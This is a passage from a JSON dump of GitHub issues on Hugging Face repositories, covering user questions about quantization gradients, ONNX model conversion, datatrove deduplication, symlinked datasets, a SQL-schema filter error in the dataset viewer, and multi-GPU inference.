(3)\r\n```\r\nAccording to chain rule, the gradient of Quantizer should be `grad_div * grad_round * grad_clamp` which is equal to `1 / scale if qmin < base/scale < qmax else 0`\r\n\r\nI have reached QTensor's unit test and I find that dequantize is applied to QTensor before backward. I am confused by `Quantizer. backward` and the `dequantize` behavior before backward.", "url": "https://github.com/huggingface/optimum-quanto/issues/146", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-31T14:33:10Z", "updated_at": "2024-04-24T13:51:20Z", "user": "shuokay" }, { "repo": "huggingface/transformers.js", "number": 673, "title": "Is dit-base supported", "body": "### Question\r\n\r\nThere is a [Huggingface repo](https://huggingface.co/Xenova/dit-base) for the ONNX version of the dit-base model but I can't seem to make it work.\r\nI keep getting the following error:\r\n![image](https://github.com/xenova/transformers.js/assets/74398804/4b0ab09e-640e-47ee-ae05-27f759830424)\r\n\r\nIs the model currently supported? 
", "url": "https://github.com/huggingface/transformers.js/issues/673", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-31T01:18:42Z", "updated_at": "2024-03-31T01:48:24Z", "user": "Maxzurek" }, { "repo": "huggingface/datatrove", "number": 143, "title": "Understand the output of deduplication", "body": "Hi \r\nI have arabic split from the CC trying to deduplicate it\r\nI used datatrove for this with a small example\r\nI got in my output folder two files\r\n0000.c4_dup and 0000.c4_sig\r\nCould you help me to understand this output\r\nI cannot read its content as it's c/00000.c4_sig is not UTF-8 encoded and seems to be binary files\r\nwhere should I see the nex text deduplicated\r\nThanks in advance", "url": "https://github.com/huggingface/datatrove/issues/143", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-30T23:16:21Z", "updated_at": "2024-05-06T09:30:43Z", "user": "Manel-Hik" }, { "repo": "huggingface/candle", "number": 1971, "title": "How to use `topk`?", "body": "I am trying to use `topk` to implement X-LoRA in Candle, and want to perform `topk` in the last dimension. Specifically, I need the `indices` return value (as returned by [`torch.topk`](https://pytorch.org/docs/stable/generated/torch.topk.html)). \r\n\r\nThese indices will either be used to creaste a mask to zero out all the values which are _not_ in the topk, and/or used to apply scalings on the nonzero values. This is a may be hard to understand, as such please see [this](https://github.com/EricLBuehler/xlora/blob/3637d1e00854649e8b9162f8f87233248577162c/src/xlora/xlora_insertion.py#L50-L63) snippet from our X-LoRA library.\r\n\r\nIs there a way to implement this with the current Candle functions, or is this planned to be implemented as a function?\r\n\r\n---\r\n\r\nAfter looking at the Mixtral MoE selection implementation, I cannot really understand it:\r\n\r\n> https://github.com/huggingface/candle/blob/3144150b8d1b80b2c6b469dcab5b717598f0a458/candle-transformers/src/models/mixtral.rs#L302-L323\r\n\r\nHow does this work? Thanks!", "url": "https://github.com/huggingface/candle/issues/1971", "state": "closed", "labels": [], "created_at": "2024-03-30T20:29:45Z", "updated_at": "2024-07-23T02:02:58Z", "user": "EricLBuehler" }, { "repo": "huggingface/transformers.js", "number": 671, "title": "What is involved in upgrading to V3?", "body": "### Question\n\nIn anticipation of being able to [generate music](https://github.com/xenova/transformers.js/issues/668) with musicGen I'm attempting to switch my project over to version 3, which I was able to build on my mac.\r\n\r\nI noticed that when using SpeechT5, the voice sounds completely garbled. I've attached a zip with two example WAV files.\r\n\r\n[audio_wav_examples.zip](https://github.com/xenova/transformers.js/files/14806203/audio_wav_examples.zip)\r\n\r\nI suspect I'm overlooking something, and need to upgrade some other things too? 
So my question is: could you give a broad overview of all the parts I need to upgrade?\r\n\r\nThings I've checked or tried:\r\n- Whisper Speech to Text is still working after 'dropping in' the new version.\r\n- Cleared caches (the JS caches)\r\n- Grabbing 'official' package from the [link to the JSDelivr repository](https://cdn.jsdelivr.net/npm/@xenova/transformers@3.0.0-alpha.0) in the V3 readme, but that doesn't work, which I assume is just an auto-build glitch.\r\n- Switching WAV generation code to the one in Transformers.js V3 example.\r\n- Switching to the [example webworker](https://github.com/xenova/transformers.js/blob/v3/examples/text-to-speech-client/src/worker.js) in the V3 branch, which looks very different, but it had no effect. (The old code was basically `synthesizer = await pipeline('text-to-speech', 'Xenova/speecht5_tts', { quantized: false });`).\r\n- The wav blob from the worker has the same issue as the raw Float32 array, so the issue is not in the way I was playing those arrays.\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/671", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-29T18:09:23Z", "updated_at": "2024-03-31T13:50:27Z", "user": "flatsiedatsie" }, { "repo": "huggingface/datasets", "number": 6764, "title": "load_dataset can't work with symbolic links", "body": "### Feature request\r\n\r\nEnable the `load_dataset` function to load local datasets with symbolic links. \r\n\r\nE.g, this dataset can be loaded:\r\n\u251c\u2500\u2500 example_dataset/\r\n\u2502 \u251c\u2500\u2500 data/\r\n\u2502 \u2502 \u251c\u2500\u2500 train/\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 file0\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 file1\r\n\u2502 \u2502 \u251c\u2500\u2500 dev/\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 file2\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 file3\r\n\u2502 \u251c\u2500\u2500 metadata.csv\r\n\r\nwhile this dataset can't:\r\n\u251c\u2500\u2500 example_dataset_symlink/\r\n\u2502 \u251c\u2500\u2500 data/\r\n\u2502 \u2502 \u251c\u2500\u2500 train/\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 sym0 -> file0\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 sym1 -> file1\r\n\u2502 \u2502 \u251c\u2500\u2500 dev/\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 sym2 -> file2\r\n\u2502 \u2502 \u2502 \u251c\u2500\u2500 sym3 -> file3\r\n\u2502 \u251c\u2500\u2500 metadata.csv\r\n\r\nI have created an example dataset in order to reproduce the problem:\r\n\r\n1. Unzip `example_dataset.zip`.\r\n2. Run `no_symlink.sh`. Training should start without issues. \r\n3. Run `symlink.sh`. You will see that all four examples will be in train split, instead of having two examples in train and two examples in dev. The script won't load the correct audio files.\r\n\r\n[example_dataset.zip](https://github.com/huggingface/datasets/files/14807053/example_dataset.zip)\r\n\r\n### Motivation\r\n\r\nI have a very large dataset locally. Instead of initiating training on the entire dataset, I need to start training on smaller subsets of the data. Due to the purpose of the experiments I am running, I will need to create many smaller datasets with overlapping data. Instead of copying the all the files for each subset, I would prefer copying symbolic links of the data. 
This way, the memory usage would not significantly increase beyond the initial dataset size.\r\n\r\nAdvantages of this approach:\r\n\r\n- It would leave a smaller memory footprint on the hard drive\r\n- Creating smaller datasets would be much faster\r\n\r\n### Your contribution\r\n\r\nI would gladly contribute, if this is something useful to the community. It seems like a simple change of code, something like `file_path = os.path.realpath(file_path)` should be added before loading the files. If anyone has insights on how to incorporate this functionality, I would greatly appreciate your knowledge and input.", "url": "https://github.com/huggingface/datasets/issues/6764", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-03-29T17:49:28Z", "updated_at": "2025-04-29T15:06:28Z", "comments": 1, "user": "VladimirVincan" }, { "repo": "huggingface/transformers.js", "number": 670, "title": "Are tokenizers supposed to work in the browser?", "body": "### Question\n\nI'd love to use some pretrained tokenizers, right in my browser. On a number of occasions, I've tried to use this library to load and use a tokenizer in my browser, but it always fails with an error like this:\r\n```\r\nUncaught (in promise) SyntaxError: JSON.parse: unexpected character at line 1 column 1 of the JSON data\r\n getModelJSON hub.js:584\r\n loadTokenizer tokenizers.js:62\r\n from_pretrained tokenizers.js:4398\r\n gv9xs tok.js:3\r\n gv9xs tok.js:9\r\n newRequire dev.42f35062.js:71\r\n dev.42f35062.js:122\r\n dev.42f35062.js:145\r\nhub.js:584:16\r\n gv9xs tok.js:3\r\n AsyncFunctionThrow self-hosted:856\r\n (Async: async)\r\n gv9xs tok.js:9\r\n newRequire dev.42f35062.js:71\r\n dev.42f35062.js:122\r\n dev.42f35062.js:145\r\n```\r\nIs there anything I can do to make this work? My code is rather simple:\r\n```\r\nimport { AutoTokenizer } from '@xenova/transformers'\r\n;(async function () {\r\n const tokenizer = await AutoTokenizer.from_pretrained(\r\n 'Xenova/bert-base-uncased'\r\n )\r\n console.log(tokenizer)\r\n const { input_ids } = await tokenizer('I love transformers!')\r\n console.log(input_ids)\r\n})()\r\n```\r\nI serve this code via a Parcel development server, but it's never worked for me. Any advice would be greatly appreciated!", "url": "https://github.com/huggingface/transformers.js/issues/670", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-29T16:10:46Z", "updated_at": "2024-03-29T16:53:21Z", "user": "Vectorrent" }, { "repo": "huggingface/transformers.js", "number": 669, "title": "TinyLlama Conversion", "body": "### Question\r\n\r\nI ran the converter script on the tinyllama repo for both the TinyLlama models ([intermediate step 1431K 3T](https://huggingface.co/TinyLlama/TinyLlama-1.1B-intermediate-step-1431k-3T) and [chat v1.0](https://huggingface.co/TinyLlama/TinyLlama-1.1B-Chat-v1.0)) and uploaded them to my repo ([intermediate step 1431K 3T](https://huggingface.co/dmmagdal/tinyllama-1.1B-intermediate-step-1431k-3T-onnx-js) [chat v1.0](https://huggingface.co/dmmagdal/tinyllama-1.1B-chat-v1.0-onnx-js); I also have uploads where the quantized flag was enabled).\r\n\r\nWhen I try to run either of my converted models with the `AutoModelForCausalLM` or `pipeline`, I get the following error:\r\n```\r\nError: Could not locate file: \"https://huggingface.co/dmmagdal/tinyllama-1.1B-chat-v1.0-onnx-js/resolve/main/onnx/decoder_model_merged.onnx\".\r\n```\r\n\r\nThis error seems to be correct in that I do not have that file in my repo. 
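\r\n\r\nFor context, `decoder_model_merged.onnx` is the export that merges the with-past and without-past decoder graphs into one; a hedged sketch of re-exporting with `optimum`, noting that whether this yields the exact file layout transformers.js expects depends on the optimum version:\r\n\r\n```python\r\nfrom optimum.onnxruntime import ORTModelForCausalLM\r\n\r\n# export=True converts on the fly; use_merged asks for a merged decoder\r\nmodel = ORTModelForCausalLM.from_pretrained(\r\n    \"TinyLlama/TinyLlama-1.1B-Chat-v1.0\", export=True, use_merged=True\r\n)\r\nmodel.save_pretrained(\"tinyllama-onnx\")\r\n```\r\n\r\n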
Was there something I did wrong in the conversion process or is the model not fully supported by transformers.js?\r\n\r\nI'm not sure how or if it relates to the TinyLlama repo you have here: https://huggingface.co/Xenova/TinyLLama-v0/tree/main", "url": "https://github.com/huggingface/transformers.js/issues/669", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-29T14:50:06Z", "updated_at": "2025-10-13T04:57:32Z", "user": "dmmagdal" }, { "repo": "huggingface/datatrove", "number": 142, "title": "Deduplicating local data throws an error", "body": "Hi,\r\n\r\nI have data in my local machine in the format of a jsonl file and I want to deduplicate it. I'm using the following example:\r\n`sent_dedup_config = SentDedupConfig(\r\n n_sentences=3,\r\n split_sentences=False, # set to False to split on \\n instead\r\n only_dedup_in_index=True,\r\n min_doc_words=50,\r\n)\r\n\r\nFINDER_WORKERS = 10 # this will speed up/parallelize step 2\r\n\r\ndef run_example():\r\n pipeline_1 = [\r\n JsonlReader(\"CC_data_inputs/\"),\r\n SentenceDedupSignature(output_folder=\"cc_output/sigs\", config=sent_dedup_config, finder_workers=FINDER_WORKERS),\r\n ]\r\n\r\n pipeline_2 = [SentenceFindDedups(data_folder=\"cc_output/sigs\", output_folder=\"cc_output/dups\", config=sent_dedup_config)]\r\n\r\n pipeline_3 = [\r\n JsonlReader(data_folder=\"CC_data_inputs/\"),\r\n SentenceDedupFilter(data_folder=\"cc_output/dups\", config=sent_dedup_config),\r\n ]\r\n\r\n executor_1: PipelineExecutor = LocalPipelineExecutor(pipeline=pipeline_1, workers=4, tasks=4)\r\n executor_2: PipelineExecutor = LocalPipelineExecutor(pipeline=pipeline_2, workers=1, tasks=FINDER_WORKERS)\r\n executor_3: PipelineExecutor = LocalPipelineExecutor(pipeline=pipeline_3, workers=4, tasks=4)\r\n\r\n print(executor_1.run())\r\n print(executor_2.run())\r\n print(executor_3.run())\r\n`\r\nI edited the first pipeline to just read the jsonl file (assuming that my data is ready directly for step 2). When I run the code, it throws this error:\r\n\r\nTraceback (most recent call last):\r\n File \"/home/ubuntu/deduplication/sentence_deduplication.py\", line 4, in \r\n from datatrove.pipeline.dedup.sentence_dedup import SentDedupConfig\r\nImportError: cannot import name 'SentDedupConfig' from 'datatrove.pipeline.dedup.sentence_dedup' (/home/ubuntu/miniconda3/lib/python3.11/site-packages/datatrove/pipeline/dedup/sentence_dedup.py)\r\n\r\nMy data consists of a set of 5 jsonl files inside the folder CC_data_inputs. I just reinstalled the datatrove library. 
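\r\n\r\nA likely cause is an installed release that predates `SentDedupConfig`; a quick check, as a sketch:\r\n\r\n```python\r\nfrom importlib.metadata import version\r\n\r\n# if this prints a release older than the example assumes, upgrade,\r\n# e.g. pip install -U datatrove (or install from source)\r\nprint(version(\"datatrove\"))\r\n```\r\n\r\n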
Could you help me figure it out?", "url": "https://github.com/huggingface/datatrove/issues/142", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-29T12:31:30Z", "updated_at": "2024-04-24T14:15:58Z", "user": "Manel-Hik" }, { "repo": "huggingface/optimum-intel", "number": 642, "title": "How to apply LoRA adapter to a model loaded with OVModelForCausalLM()?", "body": "In the transformers library, we can load multiple adapters to the original model by load_adapter then switch the specified adapter with set_adapter like below.\r\n\r\n```\r\n# base model\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n model_name,\r\n)\r\n\r\n# load multiple adapters\r\nmodel.load_adapter(\"model/adapter1/\", \"adapter1\")\r\nmodel.load_adapter(\"model/adapter2/\", \"adapter2\")\r\n\r\n# switch adapter\r\nmodel.set_adapter(\"adapter2\")\r\n```\r\nNow I want to apply LoRA adapters with OpenVINO, but I can't find an example of it.\r\nIs it possible to do it with OVModelForCausalLM?\r\n\r\n", "url": "https://github.com/huggingface/optimum-intel/issues/642", "state": "closed", "labels": [], "created_at": "2024-03-29T01:13:44Z", "updated_at": "2024-08-03T12:34:21Z", "user": "nai-kon" }, { "repo": "huggingface/transformers", "number": 29948, "title": "How to All Utilize all GPU's when device=\"balanced_low_0\" in GPU setting", "body": "### System Info\n\nI know that while loading the model in \"balanced_low_0\" GPU setting the model is loaded into all GPU's apart from 0: GPU. Where the 0: GPU is left to do the text inference. (i.e. text inference as in performing all the calculation to generate response inside the LLM)\r\n\r\nSo, as per the give device parameter my model is loaded onto 1,2,3 GPU's and 0: GPU is left for inference.\r\n\r\n| ID | GPU | MEM |\r\n| 0 | 0% | 3% |\r\n| 1 | 0% | 83% |\r\n| 2 | 0% | 82% |\r\n| 3 | 0% | 76% |\r\n\r\nQuestion: How can i also utilize the remaining 1,2,3 GPU's to perform text inference not only 0:GPU?\r\n\r\nContext: \"balanced_low_0\" evenly splits the model on all GPUs except the first one, and only puts on GPU 0 what does not fit on the others. This option is great when you need to use GPU 0 for some processing of the outputs, like when using the generate function for Transformers models\r\n\r\nReference: https://huggingface.co/docs/accelerate/en/concept_guides/big_model_inference#designing-a-device-map\r\n\r\nCC: \r\n@gante @ArthurZucker and @younesbelkada \r\n\r\nApologies if the ticket is raised under different bucket\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nna\n\n### Expected behavior\n\nna", "url": "https://github.com/huggingface/transformers/issues/29948", "state": "closed", "labels": [], "created_at": "2024-03-28T19:54:09Z", "updated_at": "2024-05-07T13:43:08Z", "user": "kmukeshreddy" }, { "repo": "huggingface/dataset-viewer", "number": 2649, "title": "Should we support /filter on columns that contain SQL commands?", "body": "See the `schema` column on https://huggingface.co/datasets/motherduckdb/duckdb-text2sql-25k. 
Clicking on any of the 'classes' leads to an error\r\n\r\n\"Capture\r\n\r\nThe erroneous URL is:\r\n\r\nhttps://datasets-server.huggingface.co/filter?dataset=motherduckdb%2Fduckdb-text2sql-25k&config=default&split=train&offset=0&length=100&where=schema%3D%27CREATE+TABLE+%22venue%22+%28%0A++%22venueId%22+INTEGER+NOT+NULL%2C%0A++%22venueName%22+VARCHAR%28100%29%2C%0A++%22venueInfo%22+JSON%2C%0A++PRIMARY+KEY+%28%22venueId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22author%22+%28%0A++%22authorId%22+INTEGER+NOT+NULL%2C%0A++%22authorName%22+VARCHAR%2850%29%2C%0A++%22authorPublications%22+INT%5B%5D%2C%0A++PRIMARY+KEY+%28%22authorId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22dataset%22+%28%0A++%22datasetId%22+INTEGER+NOT+NULL%2C%0A++%22datasetName%22+VARCHAR%2850%29%2C%0A++%22datasetInfo%22+STRUCT%28v+VARCHAR%2C+i+INTEGER%29%2C%0A++PRIMARY+KEY+%28%22datasetId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22journal%22+%28%0A++%22journalId%22+INTEGER+NOT+NULL%2C%0A++%22journalName%22+VARCHAR%28100%29%2C%0A++%22journalInfo%22+MAP%28INT%2C+DOUBLE%29%2C%0A++PRIMARY+KEY+%28%22journalId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22keyphrase%22+%28%0A++%22keyphraseId%22+INTEGER+NOT+NULL%2C%0A++%22keyphraseName%22+VARCHAR%2850%29%2C%0A++%22keyphraseInfo%22+VARCHAR%2850%29%5B%5D%2C%0A++PRIMARY+KEY+%28%22keyphraseId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22paper%22+%28%0A++%22paperId%22+INTEGER+NOT+NULL%2C%0A++%22title%22+VARCHAR%28300%29%2C%0A++%22venueId%22+INTEGER%2C%0A++%22year%22+INTEGER%2C%0A++%22numCiting%22+INTEGER%2C%0A++%22numCitedBy%22+INTEGER%2C%0A++%22journalId%22+INTEGER%2C%0A++%22paperInfo%22+UNION%28num+INT%2C+str+VARCHAR%29%2C%0A++PRIMARY+KEY+%28%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22journalId%22%29+REFERENCES+%22journal%22%28%22journalId%22%29%2C%0A++FOREIGN+KEY%28%22venueId%22%29+REFERENCES+%22venue%22%28%22venueId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22cite%22+%28%0A++%22citingPaperId%22+INTEGER+NOT+NULL%2C%0A++%22citedPaperId%22+INTEGER+NOT+NULL%2C%0A++%22citeInfo%22+INT%5B%5D%2C%0A++PRIMARY+KEY+%28%22citingPaperId%22%2C%22citedPaperId%22%29%2C%0A++FOREIGN+KEY%28%22citedpaperId%22%29+REFERENCES+%22paper%22%28%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22citingpaperId%22%29+REFERENCES+%22paper%22%28%22paperId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22paperDataset%22+%28%0A++%22paperId%22+INTEGER%2C%0A++%22datasetId%22+INTEGER%2C%0A++%22paperDatasetInfo%22+JSON%2C%0A++PRIMARY+KEY+%28%22datasetId%22%2C+%22paperId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22paperKeyphrase%22+%28%0A++%22paperId%22+INTEGER%2C%0A++%22keyphraseId%22+INTEGER%2C%0A++%22paperKeyphraseInfo%22+JSON%2C%0A++PRIMARY+KEY+%28%22keyphraseId%22%2C%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22paperId%22%29+REFERENCES+%22paper%22%28%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22keyphraseId%22%29+REFERENCES+%22keyphrase%22%28%22keyphraseId%22%29%0A%29%3B%0A%0ACREATE+TABLE+%22writes%22+%28%0A++%22paperId%22+INTEGER%2C%0A++%22authorId%22+INTEGER%2C%0A++%22writesInfo%22+JSON%2C%0A++PRIMARY+KEY+%28%22paperId%22%2C%22authorId%22%29%2C%0A++FOREIGN+KEY%28%22paperId%22%29+REFERENCES+%22paper%22%28%22paperId%22%29%2C%0A++FOREIGN+KEY%28%22authorId%22%29+REFERENCES+%22author%22%28%22authorId%22%29%0A%29%3B%27\r\n\r\n```json\r\n{\"error\":\"Parameter 'where' contains invalid symbols\"}\r\n```\r\n\r\nIt's because the content includes some of the forbidden symbols:\r\n\r\nhttps://github.com/huggingface/datasets-server/blob/4dddea2e6a476d52ba5be0c7c64fb8eca9827935/services/search/src/search/routes/filter.py#L53\r\n\r\nDo you think it's possible to support the above query? 
Or should we handle the error on the Hub (not easy to do more than currently)?", "url": "https://github.com/huggingface/dataset-viewer/issues/2649", "state": "open", "labels": [ "question", "api", "P2" ], "created_at": "2024-03-28T14:14:01Z", "updated_at": "2024-03-28T14:24:34Z", "user": "severo" }, { "repo": "huggingface/accelerate", "number": 2593, "title": "How to use training function rather than training scripts in multi GPUs and multi node?", "body": "I confirmed that the Multi-gpu launcher is executed based on the training function using the PrepareForLaunch function in \"accelerate/examples/multigpu_remote_launcher.py\".\r\n\r\nUsually, the \"accelerate launch\" or \"python -m torch.distributed.run\" command is used for multi-node, but is there a way to utilize a training function like the PrepareForLaunch function?", "url": "https://github.com/huggingface/accelerate/issues/2593", "state": "closed", "labels": [], "created_at": "2024-03-28T07:05:50Z", "updated_at": "2024-05-05T15:06:26Z", "user": "wlsghks4043" }, { "repo": "huggingface/alignment-handbook", "number": 144, "title": "Can we please add the option to work with a tokenized dataset, escpailly for the CPT task. ", "body": "Since we have the CPT task now, it would be nice to have the ability to feel a tokenized and packed dataset directly. ", "url": "https://github.com/huggingface/alignment-handbook/issues/144", "state": "open", "labels": [], "created_at": "2024-03-27T18:31:58Z", "updated_at": "2025-02-27T16:23:06Z", "comments": 1, "user": "shamanez" }, { "repo": "huggingface/transformers.js", "number": 668, "title": "Is it possible to run a music / sounds generation model?", "body": "### Question\n\nI'd love to create a browser-based music generation tool, or one that can turn text into sound effects. Is that supported?\r\n\r\nI guess my more general question is: can Transformers.js run pretty much any .onnx I throw at it, or does each model require some level of implementation before it can be used?", "url": "https://github.com/huggingface/transformers.js/issues/668", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-27T18:22:31Z", "updated_at": "2024-05-13T21:17:54Z", "user": "flatsiedatsie" }, { "repo": "huggingface/optimum-quanto", "number": 139, "title": "Dequantizing tensors using quanto", "body": "I noticed the quantized models have these 4 additional features, for every weight in the original, e.g:\r\n```\r\nmodel.layers.0.mlp.down_proj.activation_qtype,\r\nmodel.layers.0.mlp.down_proj.input_scale,\r\nmodel.layers.0.mlp.down_proj.output_scale,\r\nmodel.layers.0.mlp.down_proj.weight_qtype\r\n```\r\nI guess `qtype` refers to the quantized datatype, and `scale` probably refers to the scaling factor used during quantization? Although what is the difference between `input_scale` and `output scale`? 
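\r\n\r\nFor orientation, a generic symmetric-quantization round trip looks like the sketch below; this illustrates the usual formula, not quanto's exact code, and the reconstruction is approximate because rounding and clamping discard information:\r\n\r\n```python\r\nimport torch\r\n\r\nw = torch.randn(64, 64)\r\nscale = w.abs().max() / 127                # per-tensor symmetric scale\r\nw_q = torch.clamp(torch.round(w / scale), -127, 127).to(torch.int8)\r\nw_dq = w_q.float() * scale                 # dequantize: close to w, never exact\r\nprint((w - w_dq).abs().max())              # bounded by roughly scale / 2\r\n```\r\n\r\n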
Is it possible to recreate the exact original tensor using these values and the quantized weight?\r\nIf yes, then what would the formula be for the dequantization?", "url": "https://github.com/huggingface/optimum-quanto/issues/139", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-27T18:00:34Z", "updated_at": "2024-04-11T09:22:29Z", "user": "raunaks13" }, { "repo": "huggingface/safetensors", "number": 458, "title": "Safetensors uses excessive RAM when saving files", "body": "Safetensors uses around twice the RAM that `torch.save`:\r\n\r\n```python\r\nimport resource\r\nimport torch\r\nfrom safetensors.torch import save_file\r\n\r\ntorch.save({'tensor': torch.randn((500000000))}, 'test.torch')\r\nprint(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\r\nsave_file({'tensor': torch.randn((500000000))}, 'test.safetensors')\r\nprint(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\r\n```\r\n\r\nOutput:\r\n```\r\n2308324\r\n4261528\r\n```\r\n\r\nI believe this is because safetensors loads the full tensor in the `prepare` function instead of streaming it. Is it possible to stream the writes instead? For instance, having a `prepare_metadata` function that generates the metadata first, writing that first, then each individual tensor.", "url": "https://github.com/huggingface/safetensors/issues/458", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-03-27T12:11:38Z", "updated_at": "2024-05-02T01:47:32Z", "comments": 1, "user": "sheepymeh" }, { "repo": "huggingface/transformers", "number": 29897, "title": "How to finetune a language model after extent token embeddings?", "body": "If I add some new tokens for a language model, I will get some random initialized weights in embeddings and lm_head. Is there any official way to train only these new weights? Or all I can do is adding hooks to the tensors to zero the gradient for weights I do not want to change?", "url": "https://github.com/huggingface/transformers/issues/29897", "state": "closed", "labels": [], "created_at": "2024-03-27T08:20:24Z", "updated_at": "2024-03-27T15:01:04Z", "user": "bluewanderer" }, { "repo": "huggingface/text-generation-inference", "number": 1677, "title": "how to get the latest version number?", "body": "In the document, I use \"docker run ghcr.io/huggingface/text-generation-inference:latest\" to run the latest version of tgi. But in a production environment, I need to fix the version number. I can't find any webpage similar to [docker hub](https://hub.docker.com/r/pytorch/manylinux-cuda102). 
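\r\n\r\nGHCR implements the standard OCI distribution API, so the tag list can also be fetched over HTTP; a sketch (anonymous pull tokens work for public images, but this is untested here):\r\n\r\n```python\r\nimport requests\r\n\r\ntoken = requests.get(\r\n    \"https://ghcr.io/token\",\r\n    params={\"scope\": \"repository:huggingface/text-generation-inference:pull\"},\r\n).json()[\"token\"]\r\ntags = requests.get(\r\n    \"https://ghcr.io/v2/huggingface/text-generation-inference/tags/list\",\r\n    headers={\"Authorization\": f\"Bearer {token}\"},\r\n).json()[\"tags\"]\r\nprint(tags)\r\n```\r\n\r\n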
So how can I use docker command line to get the version list of huggingface/text-generation-inference?", "url": "https://github.com/huggingface/text-generation-inference/issues/1677", "state": "closed", "labels": [], "created_at": "2024-03-27T05:43:49Z", "updated_at": "2024-03-29T02:30:10Z", "user": "fancyerii" }, { "repo": "huggingface/optimum-quanto", "number": 134, "title": "Should quanto use int dtype in AffineQuantizer instead of uint?", "body": "According to code in https://github.com/huggingface/quanto/blob/main/quanto/tensor/qbitstensor.py#L34 I find quanto use uint dtype to store the quantized value in affine quantizer, while in symmetric quantizer it is int dtype \r\n https://github.com/huggingface/quanto/blob/main/quanto/tensor/qtensor.py#L62.\r\n\r\nTaking hardware into consideration, If we quantize both weight and activation to int types, will it save the cost of GPU or NPU since this only requires integer-type MAC arrays", "url": "https://github.com/huggingface/optimum-quanto/issues/134", "state": "closed", "labels": [ "question" ], "created_at": "2024-03-26T14:21:25Z", "updated_at": "2024-04-11T09:25:09Z", "user": "shuokay" }, { "repo": "huggingface/hub-docs", "number": 1257, "title": "Add section about deprecation of script-based datasets?", "body": "Asked here: https://github.com/huggingface/datasets-server/issues/2385#issuecomment-2017984722\r\n\r\n> Perhaps a little bit of suggestion from me is to include a disclaimer in the docs so that others are aware that developing a custom script is not supported.\r\n\r\nIt would also help answer the discussions + we could link in the error message directly.\r\n\r\n---\r\n\r\nOn the other hand, maybe we just want to deprecate it sooner than later, and not spend too much time on this.", "url": "https://github.com/huggingface/hub-docs/issues/1257", "state": "open", "labels": [ "question" ], "created_at": "2024-03-26T13:20:27Z", "updated_at": "2024-03-26T17:49:50Z", "user": "severo" }, { "repo": "huggingface/candle", "number": 1941, "title": "[help] how to update a portion of a long tensor", "body": "I'm aware of the closed issue(#1163 ) and understand that Var is mutable and Tensor is immutable by design. But I find it hard to impl some logic if it's impossible to update a portion of a Tensor.\r\n\r\nFor example, how can I generate a pairwise combination from two 2d tensors:\r\n```rust\r\n let a = Tensor::new(&[[1.0], [2.0]], &device)?;\r\n let b = Tensor::new(&[[3.0], [4.0]], &device)?;\r\n\r\n // how to generate a tensor that is the pair combination of the two?\r\n // [[1, 3], [1, 4], [2, 3], [2, 4]]\r\n\r\n let c = Tensor::zeros(&[2, 2, 1], DType::F32, &device)?;\r\n for i in 0..a.dim(0)? {\r\n for j in 0..b.dim(0)? {\r\n // won't work!\r\n // here we cannot set the content of the tensor via `set`\r\n c.i((i, j)).set(Tensor::cat(&[&a, &b], 0)?);\r\n }\r\n }\r\n```\r\n", "url": "https://github.com/huggingface/candle/issues/1941", "state": "closed", "labels": [], "created_at": "2024-03-26T11:47:56Z", "updated_at": "2024-04-07T15:42:45Z", "user": "michael8090" }, { "repo": "huggingface/optimum", "number": 1776, "title": "How to convert a model(tf_model.h5) with tokenizer folder to the onnx format", "body": "### Feature request\r\n\r\nI have trained the TensorFlow model using the Transformers library and saved the trained model and tokenizer in a folder named MODEL_WITH_TOKENIZER. 
The model is stored inside the folder in a **.h5** format - **tf_model.h5**\r\nHere is the folder structure.\r\n![Screenshot from 2024-03-26 16-17-28](https://github.com/huggingface/optimum/assets/41164884/ae132e6e-f326-4c1c-8024-367544fc679f)\r\n\r\nI want to convert the model to .onnx format\r\nShould I convert the entire MODEL_WITH_TOKENIZER folder to .onnx or only the tf_model.h5 file to onnx?\r\nwhat are the steps \r\n\r\n### Motivation\r\n\r\nHi, I have trained the TensorFlow model using the Transformers library and saved the trained model and tokenizer in a folder named MODEL_WITH_TOKENIZER. The model is stored in the **.h5** format - **model.h5**\r\nHere is the folder structure.\r\n![Screenshot from 2024-03-26 16-17-28](https://github.com/huggingface/optimum/assets/41164884/ae132e6e-f326-4c1c-8024-367544fc679f)\r\nI want to convert the model to .onnx format\r\nShould I convert the entire MODEL_WITH_TOKENIZER folder to .onnx or only the tf_model.h5 file to onnx?\r\nwhat are the steps \r\n\r\n### Your contribution\r\n\r\nI have trained the TensorFlow model using the Transformers library and saved the trained model and tokenizer in a folder named MODEL_WITH_TOKENIZER. The model is stored in the **.h5** format - **tf_model.h5**\r\nHere is the folder structure.\r\n![Screenshot from 